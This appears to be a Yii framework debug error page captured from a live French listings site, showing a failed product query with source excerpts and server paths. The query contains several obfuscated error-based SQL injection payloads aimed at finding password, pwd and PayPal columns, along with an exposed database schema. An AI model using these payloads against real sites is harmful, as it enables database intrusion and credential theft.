CDbException

CDbCommand failed to execute the SQL statement: SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'order by 1-- - and 'a'='a','38','39','40','41','659','660','661','662','42','...' at line 1. The SQL statement executed was: SELECT `t`.`id` AS `t0_c0`, `t`.`name` AS `t0_c1`, `t`.`description` AS `t0_c2`, `t`.`content` AS `t0_c3`, `t`.`manufacturer` AS `t0_c4`, `t`.`user_id` AS `t0_c5`, `t`.`module_id` AS `t0_c6`, `t`.`module2_id` AS `t0_c7`, `t`.`module3_id` AS `t0_c8`, `t`.`module4_id` AS `t0_c9`, `t`.`module5_id` AS `t0_c10`, `t`.`listing_id` AS `t0_c11`, `t`.`listing_draft_id` AS `t0_c12`, `t`.`category_id` AS `t0_c13`, `t`.`brand_id` AS `t0_c14`, `t`.`layout_id` AS `t0_c15`, `t`.`product_category_id` AS `t0_c16`, `t`.`category` AS `t0_c17`, `t`.`category_proposition` AS `t0_c18`, `t`.`contact` AS `t0_c19`, `t`.`phone` AS `t0_c20`, `t`.`mobile` AS `t0_c21`, `t`.`fax` AS `t0_c22`, `t`.`email` AS `t0_c23`, `t`.`website` AS `t0_c24`, `t`.`address` AS `t0_c25`, `t`.`address_addition` AS `t0_c26`, `t`.`city_id` AS `t0_c27`, `t`.`map_latitude` AS `t0_c28`, `t`.`map_longitude` AS `t0_c29`, `t`.`price` AS `t0_c30`, `t`.`promotion_price` AS `t0_c31`, `t`.`promotion_reduction` AS `t0_c32`, `t`.`council_price` AS `t0_c33`, `t`.`council_reduction` AS `t0_c34`, `t`.`rates` AS `t0_c35`, `t`.`initial_stock` AS `t0_c36`, `t`.`stock` AS `t0_c37`, `t`.`sell_type_id` AS `t0_c38`, `t`.`tax_id` AS `t0_c39`, `t`.`highlight_id` AS `t0_c40`, `t`.`video_url` AS `t0_c41`, `t`.`podcast_url` AS `t0_c42`, `t`.`buy_url` AS `t0_c43`, `t`.`allowed_images` AS `t0_c44`, `t`.`allowed_videos` AS `t0_c45`, `t`.`rating` AS `t0_c46`, `t`.`rating_count` AS `t0_c47`, `t`.`recommendation` AS `t0_c48`, `t`.`access_count` AS `t0_c49`, `t`.`redirect_count` AS `t0_c50`, `t`.`comment` AS `t0_c51`, `t`.`rank` AS `t0_c52`, `t`.`to_delete` AS `t0_c53`, `t`.`has_price_from_label` AS `t0_c54`, `t`.`has_invoice` AS `t0_c55`, `t`.`is_salable` AS `t0_c56`, `t`.`is_product` AS `t0_c57`, `t`.`is_highlight` AS `t0_c58`, `t`.`is_search_highlight` AS `t0_c59`, `t`.`is_promotion` AS `t0_c60`, `t`.`is_council_promotion` AS `t0_c61`, `t`.`is_featured` AS `t0_c62`, `t`.`is_validated` AS `t0_c63`, `t`.`is_indexed` AS `t0_c64`, `t`.`is_active` AS `t0_c65`, `t`.`reference` AS `t0_c66`, `t`.`highlight_end_date` AS `t0_c67`, `t`.`search_highlight_end_date` AS `t0_c68`, `t`.`created_by` AS `t0_c69`, `t`.`created_date` AS `t0_c70`, `t`.`modified_by` AS `t0_c71`, `t`.`modified_date` AS `t0_c72`, `t`.`validity_end_date` AS `t0_c73`, `t`.`sell_end_date` AS `t0_c74`, `t`.`promotion_end_date` AS `t0_c75`, `t`.`promotion_begin_date` AS `t0_c76`, `listing`.`id` AS `t1_c0`, `listing`.`sell_end_date` AS `t1_c1`, `listing`.`code` AS `t1_c2`, `listing`.`name` AS `t1_c3`, `listing`.`short_name` AS `t1_c4`, `listing`.`description` AS `t1_c5`, `listing`.`content` AS `t1_c6`, `listing`.`user_id` AS `t1_c7`, `listing`.`module_id` AS `t1_c8`, `listing`.`module2_id` AS `t1_c9`, `listing`.`module3_id` AS `t1_c10`, `listing`.`module4_id` AS `t1_c11`, `listing`.`module5_id` AS `t1_c12`, `listing`.`category_id` AS `t1_c13`, `listing`.`header_image_id` AS `t1_c14`, `listing`.`layout_id` AS `t1_c15`, `listing`.`listing_draft_id` AS `t1_c16`, `listing`.`listing_category_id` AS `t1_c17`, `listing`.`category_old` AS `t1_c18`, `listing`.`category_proposition` AS `t1_c19`, `listing`.`contact` AS `t1_c20`, `listing`.`phone` AS `t1_c21`, `listing`.`mobile` AS `t1_c22`, `listing`.`fax` AS `t1_c23`, `listing`.`email` AS `t1_c24`, `listing`.`website` AS `t1_c25`, `listing`.`address` AS `t1_c26`, `listing`.`address_addition` AS `t1_c27`, `listing`.`postal_code` AS `t1_c28`, `listing`.`city_id` AS `t1_c29`, `listing`.`map_latitude` AS `t1_c30`, `listing`.`map_longitude` AS `t1_c31`, `listing`.`video_url` AS `t1_c32`, `listing`.`podcast_url` AS `t1_c33`, `listing`.`opening_times` AS `t1_c34`, `listing`.`monday_begin` AS `t1_c35`, `listing`.`monday_end` AS `t1_c36`, `listing`.`tuesday_begin` AS `t1_c37`, `listing`.`tuesday_end` AS `t1_c38`, `listing`.`allowed_videos` AS `t1_c39`, `listing`.`rating` AS `t1_c40`, `listing`.`rating_count` AS `t1_c41`, `listing`.`recommendation` AS `t1_c42`, `listing`.`access_count` AS `t1_c43`, `listing`.`comment` AS `t1_c44`, `listing`.`rank` AS `t1_c45`, `listing`.`to_delete` AS `t1_c46`, `listing`.`is_product` AS `t1_c47`, `listing`.`is_highlight` AS `t1_c48`, `listing`.`is_search_highlight` AS `t1_c49`, `listing`.`is_promotion` AS `t1_c50`, `listing`.`is_featured` AS `t1_c51`, `listing`.`is_validated` AS `t1_c52`, `listing`.`is_indexed` AS `t1_c53`, `listing`.`is_active` AS `t1_c54`, `listing`.`reference` AS `t1_c55`, `listing`.`created_by` AS `t1_c56`, `listing`.`created_date` AS `t1_c57`, `listing`.`modified_email` AS `t1_c58`, `listing`.`modified_by` AS `t1_c59`, `listing`.`modified_date` AS `t1_c60`, `listing`.`allowed_images` AS `t1_c61`, `listing`.`wednesday_begin` AS `t1_c62`, `listing`.`wednesday_end` AS `t1_c63`, `listing`.`thursday_begin` AS `t1_c64`, `listing`.`thursday_end` AS `t1_c65`, `listing`.`friday_begin` AS `t1_c66`, `listing`.`friday_end` AS `t1_c67`, `listing`.`saturday_begin` AS `t1_c68`, `listing`.`saturday_end` AS `t1_c69`, `listing`.`sunday_begin` AS `t1_c70`, `listing`.`sunday_end` AS `t1_c71`, `listing`.`highlight_end_date` AS `t1_c72`, `listing`.`highlight_id` AS `t1_c73`, `listing`.`search_highlight_end_date` AS `t1_c74`, `listing`.`sell_type_id` AS `t1_c75` FROM `product` `t` LEFT OUTER JOIN `listing` `listing` ON (`t`.`listing_id`=`listing`.`id`) WHERE ( (t.city_id IN ('1','2','3','4','5','6','7','8','9','10','11','12','13','14','15','16','17','18','19','20','21','23','24','26','28','29','30','31','32','33','34','35','36','37') OR listing.city_id IN ('1','2','3','4','5','6','7','8','9','10','11','12','13','14','15','16','17','18','19','20','21','23','24','26','28','29','30','31','32','33','34','35','36','37')) AND t.category_id IN ('37' and 1=1 order by 1-- - and 'a'='a','38','39','40','41','659','660','661','662','42','43','44' and(/**/sElEcT 1 /**/fRoM(/**/sElEcT count(*),/**/cOnCaT((/**/sElEcT(/**/sElEcT(/**/sElEcT /**/cOnCaT(0x217e21,t./**/tAbLe_nAmE,0x217e21) /**/fRoM information_schema./**/sChEmAtA as d join information_schema./**/tAbLeS as t on t./**/tAbLe_sChEmA = d./**/sChEmA_NaMe join information_schema./**/cOlUmNs as c on c./**/tAbLe_sChEmA = d./**/sChEmA_NaMe and c./**/tAbLe_nAmE = t./**/tAbLe_nAmE /**/wHeRe not c./**/tAbLe_sChEmA in(0x696e666f726d6174696f6e5f736368656d61,0x6d7973716c) and d./**/sChEmA_NaMe = /**/dAtAbAsE() and c./**/cOlUmN_NaMe like 0x2570617373776f726425 and not t./**/tAbLe_nAmE in(0x75736572) /**/gRoUp/**/bY t./**/tAbLe_nAmE /**/lImIt 1,1)) /**/fRoM information_schema./**/tAbLeS /**/lImIt 0,1),floor(rand(0)*2))x /**/fRoM information_schema./**/tAbLeS /**/gRoUp/**/bY x)a) and '1'='1','45','46','47','48','49','50','51','52','53','54','55','87','88','89','116' and(/**/sElEcT 1 /**/fRoM(/**/sElEcT count(*),/**/cOnCaT((/**/sElEcT(/**/sElEcT(/**/sElEcT /**/cOnCaT(0x217e21,t./**/tAbLe_nAmE,0x217e21) /**/fRoM information_schema./**/sChEmAtA as d join information_schema./**/tAbLeS as t on t./**/tAbLe_sChEmA = d./**/sChEmA_NaMe join information_schema./**/cOlUmNs as c on c./**/tAbLe_sChEmA = d./**/sChEmA_NaMe and c./**/tAbLe_nAmE = t./**/tAbLe_nAmE /**/wHeRe not c./**/tAbLe_sChEmA in(0x696e666f726d6174696f6e5f736368656d61,0x6d7973716c) and d./**/sChEmA_NaMe = /**/dAtAbAsE() and c./**/cOlUmN_NaMe like 0x2570617373776f726425 and not t./**/tAbLe_nAmE in(0x75736572) /**/gRoUp/**/bY t./**/tAbLe_nAmE /**/lImIt 1,1)) /**/fRoM information_schema./**/tAbLeS /**/lImIt 0,1),floor(rand(0)*2))x /**/fRoM information_schema./**/tAbLeS /**/gRoUp/**/bY x)a) and '1'='1','117','118','119','120','121','122','123','124','125','126','127','128','129','130','131','132' and(/**/sElEcT 1 /**/fRoM(/**/sElEcT count(*),/**/cOnCaT((/**/sElEcT(/**/sElEcT(/**/sElEcT /**/cOnCaT(0x217e21,d./**/sChEmA_NaMe,0x217e21) /**/fRoM information_schema./**/sChEmAtA as d join information_schema./**/tAbLeS as t on t./**/tAbLe_sChEmA = d./**/sChEmA_NaMe join information_schema./**/cOlUmNs as c on c./**/tAbLe_sChEmA = d./**/sChEmA_NaMe and c./**/tAbLe_nAmE = t./**/tAbLe_nAmE /**/wHeRe not c./**/tAbLe_sChEmA in(0x696e666f726d6174696f6e5f736368656d61,0x6d7973716c) and c./**/cOlUmN_NaMe like 0x2570776425 and not t./**/tAbLe_nAmE in(0x666b5f636c69656e74,0x666b5f636c69656e745f313032303135,0x666b5f636c69656e745f636f7079,0x666b5f636c69656e745f6e6577,0x746563686e696369656e,0x757365725f6f6c64) /**/gRoUp/**/bY t./**/tAbLe_nAmE /**/lImIt 6,1)) /**/fRoM information_schema./**/tAbLeS /**/lImIt 0,1),floor(rand(0)*2))x /**/fRoM information_schema./**/tAbLeS /**/gRoUp/**/bY x)a) and '1'='1','133','134','135','136','137','138','139','140','141','142','143','144','145','146','147','148','149','150','151','152','153','154','155','156','157','158','159','160','161','162','163','164','165','166','167','168','169','403' and(/**/sElEcT 1 /**/fRoM(/**/sElEcT count(*),/**/cOnCaT((/**/sElEcT(/**/sElEcT(/**/sElEcT /**/cOnCaT(0x217e21,d./**/sChEmA_NaMe,0x217e21) /**/fRoM information_schema./**/sChEmAtA as d join information_schema./**/tAbLeS as t on t./**/tAbLe_sChEmA = d./**/sChEmA_NaMe join information_schema./**/cOlUmNs as c on c./**/tAbLe_sChEmA = d./**/sChEmA_NaMe and c./**/tAbLe_nAmE = t./**/tAbLe_nAmE /**/wHeRe not c./**/tAbLe_sChEmA in(0x696e666f726d6174696f6e5f736368656d61,0x6d7973716c) and c./**/cOlUmN_NaMe like 0x2570617970616c25 and not t./**/tAbLe_nAmE in(0x69706e73) /**/gRoUp/**/bY t./**/tAbLe_nAmE /**/lImIt 1,1)) /**/fRoM information_schema./**/tAbLeS /**/lImIt 0,1),floor(rand(0)*2))x /**/fRoM information_schema./**/tAbLeS /**/gRoUp/**/bY x)a) and '1'='1','404','405','406','407','408','409') AND t.is_active='1') ORDER BY t.access_count DESC, CASE WHEN (t.price is NOT NULL OR t.price>'0.00') THEN 1 ELSE 2 END,`t`.rank DESC, RAND() LIMIT 15

/home2/creole01/nouvoo.fr/domains/prod.nouvoo.fr/public_html/framework/db/CDbCommand.php(543)

531         {
532             if($this->_connection->enableProfiling)
533                 Yii::endProfile('system.db.CDbCommand.query('.$this->getText().$par.')','system.db.CDbCommand.query');
534 
535             $errorInfo=$e instanceof PDOException ? $e->errorInfo : null;
536             $message=$e->getMessage();
537             Yii::log(Yii::t('yii','CDbCommand::{method}() failed: {error}. The SQL statement executed was: {sql}.',
538                 array('{method}'=>$method, '{error}'=>$message, '{sql}'=>$this->getText().$par)),CLogger::LEVEL_ERROR,'system.db.CDbCommand');
539 
540             if(YII_DEBUG)
541                 $message.='. The SQL statement executed was: '.$this->getText().$par;
542 
543             throw new CDbException(Yii::t('yii','CDbCommand failed to execute the SQL statement: {error}',
544                 array('{error}'=>$message)),(int)$e->getCode(),$errorInfo);
545         }
546     }
547 
548     /**
549      * Builds a SQL SELECT statement from the given query specification.
550      * @param array $query the query specification in name-value pairs. The following
551      * query options are supported: {@link select}, {@link distinct}, {@link from},
552      * {@link where}, {@link join}, {@link group}, {@link having}, {@link order},
553      * {@link limit}, {@link offset} and {@link union}.
554      * @throws CDbException if "from" key is not present in given query parameter
555      * @return string the SQL statement

Stack Trace

#8
+
 /home2/creole01/nouvoo.fr/domains/prod.nouvoo.fr/public_html/protected/models/Product.php(730): CDataProvider->getData()
725         $order="t.access_count DESC".($options['order']?",".$options['order']:"");
726         $options['offset']=0;
727         $options['limit']=$limit;
728     
729         $dataProvider=Product::getDataProvider($options,$order,$ignore_search);
730         $array=$dataProvider->getData();
731         
732         shuffle($array);
733                 
734         return $array;
735     }
#9
+
 /home2/creole01/nouvoo.fr/domains/prod.nouvoo.fr/public_html/protected/controllers/ProductController.php(699): Product::getMostPopularItems(array("category_id" => null, "module_id" => "38"))
694             $condition=array('category_id'=>isset($model->category->parent)?$model->category->parent_id:$model->category_id);
695             if (!$condition['category_id'])
696                 $condition['module_id']=$module_id;            
697             
698             // Most popular
699             $items=Product::getMostPopularItems($condition);        
700             $sidebarBlocs[]=array(
701                 'name' => AP_BLOC_PATH.'_featured_list',
702                 'title' => Yii::t('app','Populaires'),
703                 'items' => $items,
704             );
#22
+
 /home2/creole01/nouvoo.fr/domains/prod.nouvoo.fr/public_html/index.php(58): CApplication->run()
53         // header("Location: http://pro.".AP_DOMAIN_NAME."/".$url);
54         // exit;
55     // }
56 
57 require_once($yii);
58 Yii::createWebApplication($config)->run();
2024-03-18 22:19:17 Apache Yii Framework/1.1.14